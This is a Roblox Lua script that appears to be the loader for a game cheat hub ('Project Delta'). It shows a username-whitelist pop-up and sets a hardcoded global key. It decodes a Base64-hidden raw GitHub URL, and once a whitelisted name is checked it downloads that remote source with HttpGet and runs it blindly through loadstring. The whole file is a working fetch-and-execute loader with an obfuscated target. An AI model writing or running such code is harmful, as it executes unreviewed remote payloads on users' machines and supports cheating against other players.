local p=game:GetService("Players")
local l=p.LocalPlayer
local g=l:WaitForChild("PlayerGui")

-- 全局预定义密钥，远程脚本全局可读取，解决No key found
_G.script_key = "KM4WswDyf7"
-- 白名单用户名
local w={"shu_tianshi","jhxdgu0","KM4WswDyf7"}

-- Base64解码函数不变
local function d(s)
    local c="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    s=s:gsub("[^"..c.."]","")
    local o,i="",1
    repeat
        local a,b,m,n=c:find(s:sub(i,i,i))-1,c:find(s:sub(i+1,i+1))-1,c:find(s:sub(i+2,i+2))-1,c:find(s:sub(i+3,i+3))-1
        o=o..string.char(bit32.lshift(a,2)+bit32.rshift(b,4))..(m~=64 and string.char(bit32.lshift(bit32.band(b,15),4)+bit32.rshift(m,2))or"")..(n~=64 and string.char(bit32.lshift(bit32.band(m,3),6)+n)or"")
        i=i+4
    until i>#s
    return o
end
local rawLink=d"aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0thcGNsYW50eWxlci93ZnIvcmVmcy9oZWFkcy9tYWluL3JhZGlhbnRodWI="

-- 验证弹窗UI完整构建
local ui=Instance.new("ScreenGui")
ui.Name="NameCheckAuth"
ui.ZIndexBehavior=Enum.ZIndexBehavior.Sibling
ui.Parent=g

local msk=Instance.new("Frame")
msk.Size=UDim2.new(1,0,1,0)
msk.BackgroundColor3=Color3.new(0,0,0)
msk.BackgroundTransparency=0.65
msk.ZIndex=1
msk.Parent=ui

local box=Instance.new("Frame")
box.Size=UDim2.new(0,320,0,180)
box.Position=UDim2.new(0.5,-160,0.5,-90)
box.BackgroundColor3=Color3.new(0.01,0.01,0.01)
box.BorderSizePixel=0
box.ClipsDescendants=true
box.ZIndex=2
box.Parent=ui
Instance.new("UICorner",box).CornerRadius=UDim.new(0,20)

local hd=Instance.new("Frame")
hd.Size=UDim2.new(1,0,0,42)
hd.BackgroundColor3=Color3.new(0.12,0.04,0.16)
hd.BackgroundTransparency=0.3
hd.Parent=box
Instance.new("UICorner",hd).CornerRadius=UDim.new(0,20)

local t=Instance.new("TextLabel")
t.Size=UDim2.new(1,0,1,0)
t.BackgroundTransparency=1
t.Text="PROJECT DELTA 用户名权限校验"
t.TextColor3=Color3.new(1,1,1)
t.Font=Enum.Font.GothamBold
t.TextSize=19
t.TextXAlignment=Enum.TextXAlignment.Center
t.Parent=hd

local nt=Instance.new("TextLabel")
nt.Size=UDim2.new(0.92,0,0,42)
nt.Position=UDim2.new(0.04,0,0.3,0)
nt.BackgroundColor3=Color3.new(0.08,0.04,0.12)
nt.BackgroundTransparency=0.2
nt.BorderSizePixel=0
nt.TextColor3=Color3.new(1,1,1)
nt.Text="你的用户名："..l.Name
nt.Font=Enum.Font.Gotham
nt.TextSize=16
nt.TextXAlignment=Enum.TextXAlignment.Center
nt.Parent=box
Instance.new("UICorner",nt).CornerRadius=UDim.new(0,12)

local err=Instance.new("TextLabel")
err.Size=UDim2.new(1,0,0,22)
err.Position=UDim2.new(0,0,0.52,0)
err.BackgroundTransparency=1
err.Text="该用户名无访问权限"
err.TextColor3=Color3.new(0.98,0.12,0.32)
err.Font=Enum.Font.Gotham
err.TextSize=15
err.TextXAlignment=Enum.TextXAlignment.Center
err.Visible=false
err.Parent=box

local btn=Instance.new("TextButton")
btn.Size=UDim2.new(0.92,0,0,44)
btn.Position=UDim2.new(0.04,0,0.65,0)
btn.BackgroundColor3=Color3.new(0.25,0.08,0.3)
btn.BorderSizePixel=0
btn.Text="确认校验身份"
btn.TextColor3=Color3.new(1,1,1)
btn.Font=Enum.Font.GothamBold
btn.TextSize=18
btn.Parent=box
Instance.new("UICorner",btn).CornerRadius=UDim.new(0,12)

-- 按钮hover变色
btn.MouseEnter:Connect(function()
    btn.BackgroundColor3=Color3.new(0.4,0.15,0.45)
end)
btn.MouseLeave:Connect(function()
    btn.BackgroundColor3=Color3.new(0.25,0.08,0.3)
end)

-- 核心点击逻辑：白名单校验 + 拉取并执行远程脚本
btn.MouseButton1Click:Connect(function()
    local un=l.Name
    local pass=false
    err.Visible=false
    -- 遍历白名单匹配用户名
    for _,v in ipairs(w)do
        if un==v then
            pass=true
            break
        end
    end
    if pass then
        ui:Destroy()
        print("校验通过，开始拉取远程脚本")
        -- 捕获HttpGet报错，防止加载失败直接卡死
        local success,scriptSource=pcall(function()
            return game:HttpGet(rawLink)
        end)
        if success then
            print("远程脚本下载完成，执行脚本")
            -- 执行远程源码，全局已提前存在script_key
            loadstring(scriptSource)()
            print("脚本运行完毕")
        else
            warn("远程链接加载失败："..tostring(scriptSource))
            warn("检查游戏内HTTP请求是否开启、Github raw是否能访问")
        end
    else
        err.Visible=true
    end
end)
